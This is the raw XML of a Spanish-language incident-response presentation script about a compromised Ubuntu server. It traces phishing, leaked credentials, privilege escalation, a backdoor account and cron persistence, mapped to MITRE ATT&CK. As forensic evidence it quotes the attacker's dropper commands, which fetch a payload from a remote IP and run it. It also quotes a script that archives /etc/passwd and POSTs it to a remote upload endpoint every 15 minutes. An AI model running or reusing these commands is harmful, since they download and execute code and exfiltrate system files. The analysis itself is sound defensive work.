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7A1F1F"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">GUION TÉCNICO DE INVESTIGACIÓN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="320" w:before="140"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Hallazgos de Compromiso Confirmado — 4geeks-server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Alcance: únicamente resultados de lo realmente vulnerado (IOCs y cadena de ataque confirmada)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="460"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Audiencia: equipo de seguridad / stakeholders técnicos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Duración estimada: 8–10 minutos + preguntas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Fecha: 18 de junio de 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nota de alcance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Este guion es deliberadamente más acotado que el informe técnico completo: cubre únicamente los hallazgos que confirman qué fue realmente vulnerado — vector de entrada, cadena de explotación, persistencia instalada y exfiltración confirmada — con su evidencia técnica de respaldo (rutas de archivo, timestamps, comandos, IOCs). No repite el detalle de las auditorías negativas (SUID, dpkg -V, lsmod, reglas de firewall, etc.); esas verificaciones de integridad están documentadas en el informe completo y se mencionan aquí solo donde son necesarias para descartar una hipótesis de explotación.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Alcance y contexto técnico</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Host afectado: 4geeks-server (192.168.0.133), Ubuntu 20.04.6 LTS, kernel 5.4.0-216-generic — rama fuera de soporte estándar (EOL), sin parches ESM activos al momento del incidente. Servicios expuestos: Apache2 (80/tcp), vsftpd (21/tcp), OpenSSH (22/tcp). Agente Wazuh HIDS instalado (solo lado agente: wazuh-execd/agentd/syscheckd/logcollector/modulesd; sin manager local accesible).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Metodología: Live Incident Response. Sin shutdown, sin imagen forense de disco, sin volcado de memoria. Acceso del analista vía SSH legítimo (cuenta "sysadmin") desde estación de respuesta 192.168.0.147, descartado como vector.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Vector de acceso inicial confirmado</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[Mostrar aquí, si hay apoyo visual, el contenido de chat.txt y credentials.txt en pantalla.]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1 Ingeniería social (T1598 / T1566)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">/home/reports/chat.txt contiene un mensaje de "unknown@externalmail.com" instando a ejecutar un script previamente enviado, con el pretexto "es limpio, avísame cuando termine el backup". Pretexto clásico de phishing dirigido (no masivo).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2 Credenciales en texto plano (T1552.001)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="EDEDED" w:val="clear"/>
        <w:spacing w:after="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/opt/.archive/credentials.txt (root:root, 23-jun-2025) → "reports:reports123"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Archivo referenciado explícitamente en /home/reports/.note ("nuevas credenciales para reports almacenadas temporalmente en /opt/.archive"), también propiedad de root — escrito después de la escalada de privilegios, no por el usuario "reports".</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.3 Valid Accounts (T1078) — dato crítico del vector</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El acceso operativo real a la cuenta "reports" se originó en /dev/tty1 (consola local de la máquina virtual), confirmado en auth.log: "Jun 23 14:07:53 ... sysadmin ... from=/dev/tty1" equivalente para reports, y reproducido para la creación posterior de "hacker". No hubo sesión de red (SSH/pty) asociada a la actividad maliciosa.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7A1F1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Origen: consola local (tty1)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="F2D9D9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Descarta T1190 (Exploit Public-Facing Application) como vector — ni Apache ni vsftpd fueron el punto de entrada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Cadena de ejecución y escalada de privilegios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1 Dropper de primera etapa (T1105, T1204.002, T1059.004)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">/home/reports/install.sh (270 bytes, 23-jun-2025):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="EDEDED" w:val="clear"/>
        <w:spacing w:after="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mkdir -p /tmp/.temp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="EDEDED" w:val="clear"/>
        <w:spacing w:after="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-s http://192.168.1.100/payload.bin -o /tmp/.temp/payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="EDEDED" w:val="clear"/>
        <w:spacing w:after="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chmod +x /tmp/.temp/payload &amp;&amp; /tmp/.temp/payload &amp;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">bash_history de "reports" confirma la secuencia real ejecutada: cat credentials.txt → wget install.sh → chmod +x → ./install.sh → nano backup.log (edición manual de cobertura posterior).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2 Escalada de privilegios (T1068) — no confirmada directamente</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El binario de segunda etapa ("payload", descargado en /tmp/.temp/) ya no estaba presente en el sistema al iniciar la investigación; no se pudo extraer ni analizar. Sin embargo, todas las acciones posteriores a nivel root (creación de cuenta, escritura en /etc/cron.d/, modificación de /etc/passwd) ocurrieron en la misma ventana de ejecución, iniciada por un proceso lanzado desde la cuenta sin privilegios "reports".</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Rutas de escalada descartadas explícitamente: sin entrada en grupo sudo, sin membresía en grupos privilegiados (lxd, docker, disk), sin reglas en /etc/sudoers.d/ más allá del README de fábrica, sin binarios SUID añadidos. Atribución por eliminación: explotación de una vulnerabilidad del kernel 5.4.0-216 (EOL). CVE específico no identificado.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Evidencia temporal indirecta: 4 reinicios del sistema el 23-jun-2025 (12:55:30, 14:50:28, 15:23:17, 16:40:13 UTC), bracketeando exactamente la ventana de instalación de persistencia. kern.log.1 y dmesg no muestran panic/oops/segfault — reinicios probablemente controlados, no caídas del exploit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Persistencia realmente establecida</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1 Cuenta de puerta trasera (T1136.001)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="EDEDED" w:val="clear"/>
        <w:spacing w:after="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useradd[1899]: new user: name=hacker, UID=1002, GID=1002, home=/home/hacker, shell=/bin/bash, from=/dev/tty1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Creada 23-jun-2025 15:02:47. Hash $6$ (sha512crypt) activo en /etc/shadow, sin bloqueo. Sin authorized_keys. Directorio home con únicamente archivos .bash_logout/.bashrc/.profile heredados de /etc/skel (feb-2020), nunca modificados. lastlog no lista la cuenta; .bash_history vacío.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7A1F1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Backdoor armado, nunca estrenado</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="F2D9D9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">La cuenta "hacker" fue creada pero no registra ninguna sesión real</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2 Tarea programada maliciosa (T1053.003, T1036.005)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="EDEDED" w:val="clear"/>
        <w:spacing w:after="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/etc/cron.d/sys-maintenance: */15 * * * * root /usr/local/bin/backup2.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Fecha de archivo: 23-jun-2025 — anómala respecto a vecinos legítimos en /etc/cron.d/ (Feb-2020 / Mar-2023). Nombre "sys-maintenance" diseñado para confundirse con tareas administrativas legítimas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.3 Manipulación de cuenta de servicio (T1098)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Shell de www-data modificada de /usr/sbin/nologin a /bin/bash. Sin evidencia de uso interactivo confirmado de esta vía, pero ampliaba la superficie de persistencia disponible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Exfiltración confirmada vs. fabricada</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.1 Lo que SÍ se exfiltró (T1005, T1071.001, T1041)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="EDEDED" w:val="clear"/>
        <w:spacing w:after="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/usr/local/bin/backup2.sh:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="EDEDED" w:val="clear"/>
        <w:spacing w:after="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tar -czf /tmp/secrets.tgz /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="EDEDED" w:val="clear"/>
        <w:spacing w:after="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curl -X POST -F 'file=@/tmp/secrets.tgz' http://192.168.1.100:8080/upload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">tar -tvf /tmp/secrets.tgz confirmó únicamente /etc/passwd (root:root, mtime 2025-06-23 15:02) dentro del archivo. Ejecución recurrente confirmada en syslog: CRON[6088] @ 02:30:01, CRON[6125] @ 02:45:01 — intervalo de 15 min sostenido sin interrupción desde el 23-jun-2025 hasta la detección, ≈ 1 año de dwell time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.2 Lo que NO se exfiltró (a pesar de lo afirmado por el atacante)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">/home/reports/backup.log (log de cobertura, editado manualmente con nano) describe una compresión y subida de /etc/shadow hacia "102.168.1.100:8080" — IP con typo respecto a la real (192.168.1.100), lo que delata fabricación manual. Verificación: búsqueda global find / -name "*.tgz" -o -name "*.tar.gz" sin resultados adicionales; mtime de /etc/shadow (15:03:53) se explica por el alta de contraseña de "hacker" (15:02:47 + 66s), no por una compresión del archivo.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7A1F1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1 archivo exfiltrado: /etc/passwd</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="F2D9D9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">0 evidencia de exfiltración de /etc/shadow — mencionada pero fabricada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Cronología técnica condensada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Timestamp (UTC)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Evento de compromiso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2025-06-21 19:54:52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Creación de "reports" (UID 1001) desde /dev/tty1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auth.log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2025-06-23 ≈ 14:07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Phishing recibido + login real de "reports" en tty1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chat.txt / lastlog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2025-06-23 14:07–14:40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Ejecución de install.sh; descarga y corrida de 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bash_history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2025-06-23 15:02:47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Creación de "hacker" (UID 1002) + mtime /etc/passwd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auth.log / stat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2025-06-23 ≈ 15:02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Siembra de /etc/cron.d/sys-maintenance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ls -la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2025-06-23 15:03:53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mtime /etc/shadow (alta password "hacker")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2025-06-23 en adelante, /15min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Exfiltración recurrente de /etc/passwd a 192.168.1.100:8080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syslog CRON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2026-06-10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Conexión SYN_SENT al C2 detectada en triage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netstat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Alcance real del compromiso — resumen de IOCs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 en el ataque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 de C2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192.168.1.100:8080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Origen del dropper/payload; destino de exfiltración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Endpoints C2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/install.sh, /payload.bin, /upload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Distribución de malware y recepción de datos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Cuenta comprometida (uso real)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reports (UID 1001)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Acceso operativo inicial vía credencial filtrada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Cuenta backdoor (no usada)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hacker (UID 1002)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Persistencia para reingreso futuro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Archivo exfiltrado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/etc/passwd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Único dato confirmado fuera del perímetro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Mecanismo de persistencia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/etc/cron.d/sys-maintenance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Ejecución recurrente cada 15 min como root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Cuenta de servicio manipulada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www-data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Shell cambiada a /bin/bash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Dwell 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365 días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23-jun-2025 a 10-jun-2026 sin detección</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Fuera de este alcance: no se hallaron binarios troyanizados, módulos de kernel maliciosos, ni reglas de firewall modificadas. La superficie de compromiso confirmada se limita a las dos cuentas, el cron, el cambio de shell de www-data, y la exfiltración puntual de /etc/passwd.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8. Mapeo MITRE ATT&amp;CK — técnicas confirmadas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Táctica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Técnica (ID)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Phishing (T1566) / Valid Accounts (T1078)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chat.txt + credentials.txt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Execution (T1204.002)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install.sh ejecutado tras pretexto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Exploitation for PrivEsc (T1068)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Atribuido por descarte; kernel EOL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Account (T1136.001)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Cuenta "hacker"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Scheduled Task/Cron (T1053.003)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/etc/cron.d/sys-maintenance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Defense Evasion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Masquerading (T1036.005)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Nombre "sys-maintenance"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from Local System (T1005)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/etc/passwd → secrets.tgz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and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Protocols (T1071.001)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curl/HTTP a 192.168.1.100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Exfiltration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Exfiltration Over C2 (T1041)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periódico a /upload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Cierre</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[Breve — el foco de esta sesión fue el compromiso, no la remediación.]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Resumen de lo realmente vulnerado: una credencial filtrada permitió acceso operativo a "reports"; un payload de segunda etapa escaló a root probablemente vía exploit de kernel EOL; se estableció persistencia mediante una cuenta backdoor (no usada) y un cron malicioso; y se confirmó exfiltración recurrente de /etc/passwd durante ≈ 1 año. La mencionada exfiltración de /etc/shadow fue descartada como fabricación.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Todas las acciones de contención, erradicación y verificación de integridad asociadas están documentadas en el informe técnico completo. Limitación abierta: el binario de segunda etapa no se recuperó, por lo que el CVE específico de la escalada de privilegios permanece sin confirmar.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quedo abierto a preguntas técnicas.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Guion Técnico — Hallazgos de Compromiso — 4geeks-server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A1F1F" w:sz="8" w:space="4"/>
      </w:pBdr>
      <w:spacing w:after="200" w:before="320"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="7A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Tecnico - Hallazgos de Compromiso 4geeks-server</dc:title>
  <dc:creator>Equipo de Respuesta a Incidentes</dc:creator>
  <cp:lastModifiedBy>Un-named</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-06-18T11:33:14.524Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-18T11:33:14.524Z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